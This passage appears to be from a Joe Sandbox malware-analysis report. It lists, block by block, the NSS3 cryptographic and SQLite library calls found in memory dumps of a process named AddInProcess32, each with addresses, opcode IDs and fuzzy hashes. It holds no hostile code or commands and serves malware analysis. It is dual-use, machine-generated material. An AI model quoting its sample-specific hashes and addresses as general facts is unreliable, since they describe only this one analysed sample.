                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unlock$Lock$FreeHashLookupTable
                                                                                      • String ID:
                                                                                      • API String ID: 1503674569-0
                                                                                      • Opcode ID: 27b374a53ba77d164d5a8cb4dbdbe22db4b617fa74ba9c8bad613e3ac90e8379
                                                                                      • Instruction ID: 640c039becb772e4bab390a04e860063b6611f266cb2357302a3efb983022d61
                                                                                      • Opcode Fuzzy Hash: 27b374a53ba77d164d5a8cb4dbdbe22db4b617fa74ba9c8bad613e3ac90e8379
                                                                                      • Instruction Fuzzy Hash: DA519E72900904BFDB419FA4DD40A9EBBF8FF09348F144168E924D7A20F731EA56DBA1
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(00000000,?,00000001,00000000,?), ref: 6CD10EEA
                                                                                      • PK11_GetBlockSize.NSS3(?,?), ref: 6CD10EFE
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000001,00000000,?), ref: 6CD10F38
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,00000001,00000000,?), ref: 6CD10F86
                                                                                      • PORT_SetError_Util.NSS3(00000000,?), ref: 6CD10FA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_$BlockFreeItem_K11_Size
                                                                                      • String ID:
                                                                                      • API String ID: 4048240481-0
                                                                                      • Opcode ID: b682569ebe65a22802f8a301c31fbc0d1944237aff06c94ea7882fd761ea4081
                                                                                      • Instruction ID: d9dd365ae5014abc29f2bac428721c65c7ea67e0ac26bc0d4f2b47f4ae991ef1
                                                                                      • Opcode Fuzzy Hash: b682569ebe65a22802f8a301c31fbc0d1944237aff06c94ea7882fd761ea4081
                                                                                      • Instruction Fuzzy Hash: F0418F71609208EFDB00EF69D980EEE77B8FF44358F108059F8149BA61DB35EA55CBA1
                                                                                      APIs
                                                                                        • Part of subcall function 6CD2B4F0: PK11_SetPasswordFunc.NSS3(00000000,?,6CD29A1A,00000000,?,?,?,?,00000000,00000000), ref: 6CD2B4FC
                                                                                      • PORT_ZAlloc_Util.NSS3(0000002C,?,?,?,?,?,?,?), ref: 6CD2A825
                                                                                        • Part of subcall function 6CD1CC25: PR_Calloc.NSS3(00000001,00000001,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC41
                                                                                        • Part of subcall function 6CD1CC25: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC56
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CD2A838
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECMOD_PubCipherFlagstoInternal.NSS3(?), ref: 6CD2A866
                                                                                      • NSS_CMSContentInfo_GetContentTypeTag.NSS3(00000000,?), ref: 6CD2A86E
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD2A931
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ContentError$Alloc_CallocCipherError_FlagstoFree_FuncInfo_InternalK11_PasswordType
                                                                                      • String ID:
                                                                                      • API String ID: 3309564374-0
                                                                                      • Opcode ID: 8c42ecbe62404a05ccf92ca3154d1cf957090f30021c0334445ec84ba052d723
                                                                                      • Instruction ID: b2397305426a67ba1b54eece5413fd0941d61acd52aa9bdccd9135e42c273dcb
                                                                                      • Opcode Fuzzy Hash: 8c42ecbe62404a05ccf92ca3154d1cf957090f30021c0334445ec84ba052d723
                                                                                      • Instruction Fuzzy Hash: 4E31D071504206EFDB149F79DC409AAFBF4EF0825C750862DF65D82E30EB3AD8169BA0
                                                                                      APIs
                                                                                      • PK11_PubUnwrapSymKey.NSS3(?,?,?,00000107,00000000,00000000,00000000,00000000), ref: 6CD3A8BA
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001,00000000,00000000,00000000), ref: 6CD3A8FD
                                                                                      • PK11_PubDeriveWithKDF.NSS3(?,?,00000000,00000000,00000000,00001050,?,0000010C,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6CD3A972
                                                                                      • PK11_UnwrapSymKey.NSS3(00000000,?,00000000,?,?,00000107,00000000), ref: 6CD3A995
                                                                                      • PK11_FreeSymKey.NSS3(00000000,00000000,?,00000000,?,?,00000107,00000000), ref: 6CD3A99D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_$Unwrap$DeriveError_FreeUtilWith
                                                                                      • String ID:
                                                                                      • API String ID: 96900979-0
                                                                                      • Opcode ID: 71a143c42ff4197cc5f091a9d67a707e718b6674f18a3e9d01d9392973a0ec96
                                                                                      • Instruction ID: 8ee8435a96fc9cb3b07230bf17f2b005014d85c7c9731d55eaa69a18c7a60093
                                                                                      • Opcode Fuzzy Hash: 71a143c42ff4197cc5f091a9d67a707e718b6674f18a3e9d01d9392973a0ec96
                                                                                      • Instruction Fuzzy Hash: 7B417171A01234AADB10CF59CC44BEAF7F8EF06704F1441AAF94DD6651E7758986CFA0
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE002,?,00000000,?,?,6CD29CD0,?,?), ref: 6CD2B019
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE02D,?,00000000,?,?,6CD29CD0,?,?), ref: 6CD2B050
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$Error
                                                                                      • String ID:
                                                                                      • API String ID: 2687509522-0
                                                                                      • Opcode ID: 024e5108371819d844caeaa4aa3ad4c15189789e735e7735adf41135babbb7a1
                                                                                      • Instruction ID: 1b24ce38f1018fa18b66ec29634517674f573108c1ad290385875d580f732576
                                                                                      • Opcode Fuzzy Hash: 024e5108371819d844caeaa4aa3ad4c15189789e735e7735adf41135babbb7a1
                                                                                      • Instruction Fuzzy Hash: 5031E931608201FBDB099FA9DD409A9B7B5FF4632C7100169EA1196FF1DFB9DD50C6A0
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE028,00000000,?,?,6CCEC92B,?), ref: 6CD09CB6
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECKEY_ECParamsToBasePointOrderLen.NSS3(?,?,?,?,00000000,?,?,6CCEC92B,?), ref: 6CD09CE2
                                                                                      • PORT_Free_Util.NSS3(6CCEC92B,?,?,?,?,00000000,?,?,6CCEC92B,?), ref: 6CD09CEC
                                                                                      • PORT_Free_Util.NSS3(6CCEC92B,?,?,?,00000000,?,?,6CCEC92B,?), ref: 6CD09D39
                                                                                      • PK11_GetPrivateModulusLen.NSS3(6CCEC92B,00000000,?,?,6CCEC92B,?), ref: 6CD09D44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_$BaseErrorError_K11_ModulusOrderParamsPointPrivate
                                                                                      • String ID:
                                                                                      • API String ID: 1678349840-0
                                                                                      • Opcode ID: 8e0acba1af9eca919c1dd59fd8f147fb39c7d79aaf47e39a57bd697428a74009
                                                                                      • Instruction ID: 34735c096de099b0af9254e4b70989faf6683013fe8c80dadde7ea8d7ea2fd14
                                                                                      • Opcode Fuzzy Hash: 8e0acba1af9eca919c1dd59fd8f147fb39c7d79aaf47e39a57bd697428a74009
                                                                                      • Instruction Fuzzy Hash: 3621C4B2E84609BBCB019F6CDC00ADA7BB8EF45325F508659E46596E70E770EA04C670
                                                                                      APIs
                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(6CCDD9EB,6CCDD9F7,00000001,00000000,?,6CCDD9A3,00000000,?,?,?,?,?,?,?,00000001), ref: 6CCDEF75
                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(F975C084,?,00000000,00000001,00000000,?,6CCDD9A3,00000000,?,?,?,?,?,?,?,00000001), ref: 6CCDEFB3
                                                                                      • PORT_Free_Util.NSS3(6CCDD9A3,F975C084,?,00000000,00000001,00000000,?,6CCDD9A3,00000000), ref: 6CCDEFBD
                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(6CCDD9EB,00000000,?,00000001,00000000,?,6CCDD9A3,00000000,?,?,?,?,?,?,?,00000001), ref: 6CCDEFEB
                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(6CCDDA27,F975C074,00000001,00000000,?,6CCDD9A3,00000000,?,?,?,?,?,?,?,00000001), ref: 6CCDF00D
                                                                                        • Part of subcall function 6CCDF749: PORT_InitCheapArena.NSS3(?,00000800,?,00000000,00000000,?,?,?,?,?,?,?,?,?,6CCDEDDA,00000000), ref: 6CCDF78B
                                                                                        • Part of subcall function 6CCDF749: NSS_Get_SEC_OctetStringTemplate_Util.NSS3(00000000,00000000,6CCDD984,?,00000000,00000000,?,?,?,?,?,?,?,?,?,6CCDEDDA), ref: 6CCDF798
                                                                                        • Part of subcall function 6CCDF749: SEC_QuickDERDecodeItem_Util.NSS3(?,?,00000000,6CCDD984,?,00000000,00000000), ref: 6CCDF7A8
                                                                                        • Part of subcall function 6CCDF749: SECITEM_CopyItem_Util.NSS3(00000000,6CCDD984,?,?,?,?,?,?,00000000,00000000), ref: 6CCDF7BE
                                                                                        • Part of subcall function 6CCDF749: PORT_DestroyCheapArena.NSS3(?,?,?,?,?,?,00000000,00000000), ref: 6CCDF7CC
                                                                                        • Part of subcall function 6CCDF749: SECITEM_FreeItem_Util.NSS3(6CCDD984,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,6CCDEDDA,00000000), ref: 6CCDF7D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Equal_Items$Item_$ArenaCheap$CopyDecodeDestroyFreeFree_Get_InitOctetQuickStringTemplate_
                                                                                      • String ID:
                                                                                      • API String ID: 1990824372-0
                                                                                      • Opcode ID: abb3b679c1fd6f51e2a86b89bd391a806f365ee76889c98367a9710abac364f5
                                                                                      • Instruction ID: 17f80dca266125a178e5bc4cc77d115bc0e24c18a60009a67e25897574952008
                                                                                      • Opcode Fuzzy Hash: abb3b679c1fd6f51e2a86b89bd391a806f365ee76889c98367a9710abac364f5
                                                                                      • Instruction Fuzzy Hash: 08219072A056026EE7048775EC40BE6B3ACBB01358F214126EA15C7E91FF22F559CAE0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: htons$ErrorInithtonl
                                                                                      • String ID:
                                                                                      • API String ID: 2512280343-0
                                                                                      • Opcode ID: f3140e2e28f7bd3a97c66fa1592f18ffbeebfc8caba9aa197e2a1e847fcc3248
                                                                                      • Instruction ID: d7baa81b8390d8f12d5f5eb97677602219c7b5c3a981c64c0f9e5109b157f1d1
                                                                                      • Opcode Fuzzy Hash: f3140e2e28f7bd3a97c66fa1592f18ffbeebfc8caba9aa197e2a1e847fcc3248
                                                                                      • Instruction Fuzzy Hash: 3521D172805A15AAEB118FB8D980196B734FF053287238225EF152BF60F331B855C3D2
                                                                                      APIs
                                                                                      • SECOID_FindOIDByTag_Util.NSS3(?,00000000,?,6CCE8B15,?,00000000,00000004,00000000), ref: 6CD18C3C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE006,00000000,?,6CCE8B15,?,00000000,00000004,00000000), ref: 6CD18C4B
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000004,00000000,00000000,?,00000000,?,6CCE8B15,?,00000000,00000004,00000000), ref: 6CD18C62
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000004,0000000C,00000000), ref: 6CD18CB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$CopyItem_$ErrorError_FindTag_
                                                                                      • String ID:
                                                                                      • API String ID: 1030731488-0
                                                                                      • Opcode ID: 611ac680690d27d48c3db0ad07d58545b352b2bae4ad2c7ea0ec7af7002c84c0
                                                                                      • Instruction ID: 503da14fb6fb54e8a88c9656e3bddbb191f7cd907149b0664fc0bc6575851819
                                                                                      • Opcode Fuzzy Hash: 611ac680690d27d48c3db0ad07d58545b352b2bae4ad2c7ea0ec7af7002c84c0
                                                                                      • Instruction Fuzzy Hash: 42110A7164F215EAEB00DB29FD00B9A775AAF01368F060237EC24D6FB0E720D959C6A1
                                                                                      APIs
                                                                                      • PR_Calloc.NSS3(00000001,00000028,00000000,?,6CCE0593,00000000,00000000,?,6CCE699C,00000000,?,6CCE0F05,?,00000000,00000000,00000000), ref: 6CD169E1
                                                                                      • PR_NewLock.NSS3(?,00000000,00000000,00000000,?,6CCE699C,00000000,?,6CCE0F05,?,00000000,00000000,00000000,?,00000001), ref: 6CD169F5
                                                                                      • PR_NewCondVar.NSS3(00000000,?,6CCE0F05,?,00000000,00000000,00000000,?,00000001,?,6CCDFDC8,00000001,?,00000000,00000001,00000001), ref: 6CD16A08
                                                                                      • PR_NewCondVar.NSS3(00000000,6CCE0F05,?,00000000,00000000,00000000,?,00000001,?,6CCDFDC8,00000001,?,00000000,00000001,00000001,00000000), ref: 6CD16A14
                                                                                      • PR_Malloc.NSS3(00000002,6CCDFDC8,00000001,?,00000000,00000001,00000001,00000000,6CCE14D2,00000001,00000055,00000000,00000001,?,6CCE699C), ref: 6CD16A39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cond$CallocLockMalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1329971880-0
                                                                                      • Opcode ID: 3cd9ff43760849e93f6a29832dc10181d9daf7986b10e1e435e67b117696a38b
                                                                                      • Instruction ID: f9f356bee04f2726fc76e9a05d799c9057e8c2797a651249c454bcd307069053
                                                                                      • Opcode Fuzzy Hash: 3cd9ff43760849e93f6a29832dc10181d9daf7986b10e1e435e67b117696a38b
                                                                                      • Instruction Fuzzy Hash: 4D21E43624DB02CFEB258F6AE49016EFBF8FF46624724852ED599C7E50DB31D4028B60
                                                                                      APIs
                                                                                      • PR_Now.NSS3(?,00000000), ref: 6CD2C9E4
                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CD2CA10
                                                                                      • SECITEM_AllocItem_Util.NSS3(?,00000000,00000000,?), ref: 6CD2CA1C
                                                                                      • PT_FPrintStats.NSS3(?,00000000), ref: 6CD2CA62
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$AllocArenaItem_Mark_PrintStats
                                                                                      • String ID:
                                                                                      • API String ID: 443227118-0
                                                                                      • Opcode ID: 6a1436f135488a4d2e39d938f1d0fe77534c114396a2a681884265244f3468c2
                                                                                      • Instruction ID: 4a80c55bfd2b274d8d11398b25404c9cac9824cd9e37e358d427fb6c7e7979c5
                                                                                      • Opcode Fuzzy Hash: 6a1436f135488a4d2e39d938f1d0fe77534c114396a2a681884265244f3468c2
                                                                                      • Instruction Fuzzy Hash: 9F1123726056007AFB00AB759C81FDB375C9F867ACF104011FB10C9AE0FB76C94082B4
                                                                                      APIs
                                                                                      • PR_Now.NSS3(?,00000000), ref: 6CD2CAFF
                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CD2CB2B
                                                                                      • SECITEM_AllocItem_Util.NSS3(?,00000000,00000000,?), ref: 6CD2CB37
                                                                                      • PT_FPrintStats.NSS3(?,00000000), ref: 6CD2CB7D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$AllocArenaItem_Mark_PrintStats
                                                                                      • String ID:
                                                                                      • API String ID: 443227118-0
                                                                                      • Opcode ID: 7e0350b29774bba58d346b549a26ebd347a2576629131698ae44b0245d9e9f94
                                                                                      • Instruction ID: 3da8c94a4a30a50f2dfe407fb68d12be06dfac032aacd66359861a0f2a7b4467
                                                                                      • Opcode Fuzzy Hash: 7e0350b29774bba58d346b549a26ebd347a2576629131698ae44b0245d9e9f94
                                                                                      • Instruction Fuzzy Hash: 7A11C432A456007AFB202B759C41FEB376C9F8536CF100210FB24D96E0FB66C94086B5
                                                                                      APIs
                                                                                      • PORT_InitCheapArena.NSS3(?,00000800,?,?), ref: 6CCE488B
                                                                                        • Part of subcall function 6CD1CA46: PL_InitArenaPool.NSS3(00000000,security,00000000,00000008,?,6CCE33EC,?,00000800,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E), ref: 6CD1CA5E
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CD5FD30,?,?,00000800,?,?), ref: 6CCE48A0
                                                                                        • Part of subcall function 6CD18A99: PORT_SetError_Util.NSS3(FFFFE08C,?,?,00000000), ref: 6CD18AE6
                                                                                      • DER_GetInteger_Util.NSS3(?,?,?,?,?,?,?), ref: 6CCE48DD
                                                                                        • Part of subcall function 6CD15598: PORT_SetError_Util.NSS3(FFFFE004,00000000,?,6CCE48E2,?,?,?,?,?,?,?), ref: 6CD155AE
                                                                                      • PORT_SetError_Util.NSS3(FFFFE009,?,?,?,?,?,?), ref: 6CCE48F8
                                                                                      • PORT_DestroyCheapArena.NSS3(?,?,?,?,?,?,?), ref: 6CCE4905
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ArenaError_$CheapInit$DecodeDestroyInteger_Item_PoolQuick
                                                                                      • String ID:
                                                                                      • API String ID: 2781336874-0
                                                                                      • Opcode ID: 1432c5989b64ac87636e4949835ac0cc0b07f90a2daec8e94593f4e24d24e493
                                                                                      • Instruction ID: 2069d8210c42d59ce1a747748295440781a256159a1d83b028e833f6aefa8060
                                                                                      • Opcode Fuzzy Hash: 1432c5989b64ac87636e4949835ac0cc0b07f90a2daec8e94593f4e24d24e493
                                                                                      • Instruction Fuzzy Hash: 89119A7190530DA7DF10DBD89841ACD77ACAF4A339F140226D924E6ED0E775A4558790
                                                                                      APIs
                                                                                      • sqlite3_aggregate_context.NSS3(?,00000018), ref: 6CC6800F
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC68037
                                                                                      • sqlite3_value_bytes.NSS3(?,?), ref: 6CC68041
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC68063
                                                                                      • sqlite3_value_bytes.NSS3(?,?), ref: 6CC6806C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                      • String ID:
                                                                                      • API String ID: 4225432645-0
                                                                                      • Opcode ID: 799e5b56280248f9d6fe6d977bb25390d5927753b0086c81124da714d84ffb99
                                                                                      • Instruction ID: eaf12af0342a899630a652911dee88c97199d81424d5a8ef73249abc144745b9
                                                                                      • Opcode Fuzzy Hash: 799e5b56280248f9d6fe6d977bb25390d5927753b0086c81124da714d84ffb99
                                                                                      • Instruction Fuzzy Hash: D11136B2600702AFDB104B56C9C0D9673D9FF0A328720882AE9588BF40FF31DD66CB90
                                                                                      APIs
                                                                                        • Part of subcall function 6CCDF749: PORT_InitCheapArena.NSS3(?,00000800,?,00000000,00000000,?,?,?,?,?,?,?,?,?,6CCDEDDA,00000000), ref: 6CCDF78B
                                                                                        • Part of subcall function 6CCDF749: NSS_Get_SEC_OctetStringTemplate_Util.NSS3(00000000,00000000,6CCDD984,?,00000000,00000000,?,?,?,?,?,?,?,?,?,6CCDEDDA), ref: 6CCDF798
                                                                                        • Part of subcall function 6CCDF749: SEC_QuickDERDecodeItem_Util.NSS3(?,?,00000000,6CCDD984,?,00000000,00000000), ref: 6CCDF7A8
                                                                                        • Part of subcall function 6CCDF749: SECITEM_CopyItem_Util.NSS3(00000000,6CCDD984,?,?,?,?,?,?,00000000,00000000), ref: 6CCDF7BE
